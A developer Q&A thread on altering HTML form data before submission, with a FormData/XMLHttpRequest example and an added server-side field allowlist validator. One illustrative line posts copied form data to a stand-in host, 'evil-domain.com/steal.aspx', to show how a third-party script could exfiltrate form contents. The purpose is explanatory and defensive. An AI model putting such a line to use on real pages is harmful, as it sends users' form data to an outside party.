Is there a way to modify the form data that will be sent to the server before submitting it?

Short of adding more hidden controls to the form in the submit event, is there a way to change the payload that will be sent when a form is submitted, before the form is submitted?

$("#frm").submit(function (event) {
  // Is there an API to change
  // the request body here
});

For e.g., I'd like to --

  1. Change the name of a hidden field that's being sent.

  2. Add a few iterable / enumerable objects to the request body / payload.

I can work around both the issues, by adding more hidden controls with the names I want, to the form, and write a custom model binder on the server.

But is there a client-side API that allows you to modify the contents that will be sent to the server before sending them?

I advise you to look at "Is it possible to change form data before sending it?"

That question may have a partial solution for your problem, as far as I understand.

As of this time, no there isn't. And there probably never will be because of the security implications of this.

Security Implications of Having Such a Feature

Imagine a third-party script you downloaded because you were using a plug-in (for e.g. Google Analytics, ShareThis, ads from an ad provider, etc.) being able to inject their own data into your forms. It would be possible for them to do this if there was such a way.

But you can do something like that for AJAX requests

There is indeed a FormData object but that's just a property bag that allows a script to copy data from an existing form element on the page or to simply start with a blank FormData object, i.e. a blank property bag, put some additional properties in it, and send those off to a server, whether your web application or a third-party one, but only in an AJAX request.

var additionalDataToAppendToForm = { /* ... */ };

var formData = new FormData(myFormElement); // copies existing values from form to FormData
formData.delete(existingFieldName1);
formData.set(existingFieldName2, "newValue");
// FormData values are strings or Blobs, so serialize the object before appending it
formData.append(/* name */ "additionalField1", /* value */ JSON.stringify(additionalDataToAppendToForm));

var xhr = new XMLHttpRequest(); // the constructor name is case-sensitive
xhr.open("POST", "https://evil-domain.com/steal.aspx");
xhr.send(formData);

And that's a security implication for your web application if and only if you have not paid attention to the Same Origin Policy and not protected your web server from pre-flight requests from other domains.

PS: I had asked this question and had back then decided that there wasn't a way and that was correct, and had added more hidden fields to my form, as indicated in my question. But since then, I was meaning to write an answer to clarify for anyone else who may have this question, so I am writing this answer.
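
A server-side counterpart to the answer above, as an added example that is not part of the original post: because a script can delete, set and append entries before the data is sent, the receiving handler should check the submitted field set against the one the form was rendered with. The field names, rules and sample bodies are constructed assumptions.

```javascript
// Added example: allowlist check for an application/x-www-form-urlencoded body.
// EXPECTED_FIELDS and both sample bodies are constructed for illustration.
const EXPECTED_FIELDS = {
  userName: { required: true, maxLength: 64 },
  orderId: { required: true, pattern: /^[0-9]{1,10}$/ }, // the hidden field
  comment: { required: false, maxLength: 500 },
};

function validateFormBody(rawBody, expected = EXPECTED_FIELDS) {
  const errors = [];
  const seen = new Map();
  // URLSearchParams decodes the body and keeps duplicate names, so appended
  // copies of a field stay visible instead of silently overwriting each other.
  for (const [name, value] of new URLSearchParams(rawBody)) {
    // hasOwnProperty keeps names like "constructor" from matching the prototype.
    if (!Object.prototype.hasOwnProperty.call(expected, name)) {
      errors.push(`unexpected field: ${name}`);
      continue;
    }
    if (seen.has(name)) {
      errors.push(`duplicate field: ${name}`);
      continue;
    }
    seen.set(name, value);
    const rule = expected[name];
    if (rule.maxLength !== undefined && value.length > rule.maxLength) {
      errors.push(`field too long: ${name}`);
    }
    if (rule.pattern && !rule.pattern.test(value)) {
      errors.push(`invalid value: ${name}`);
    }
  }
  for (const [name, rule] of Object.entries(expected)) {
    if (rule.required && !seen.has(name)) errors.push(`missing field: ${name}`);
  }
  return { ok: errors.length === 0, errors, fields: Object.fromEntries(seen) };
}

// Constructed samples: the form as rendered, and the same submission after a
// script renamed the hidden field, appended a field and added a duplicate.
const LEGITIMATE_BODY = "userName=alice&orderId=1042&comment=hello+there";
const TAMPERED_BODY =
  "userName=alice&order_id=1042&additionalField1=%7B%7D&userName=mallory";

console.log(validateFormBody(LEGITIMATE_BODY));
console.log(validateFormBody(TAMPERED_BODY));
```

A value changed with set() on an expected field still passes the name check, so per-field rules such as the orderId pattern, and server-side authorization on what the value refers to, remain necessary.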
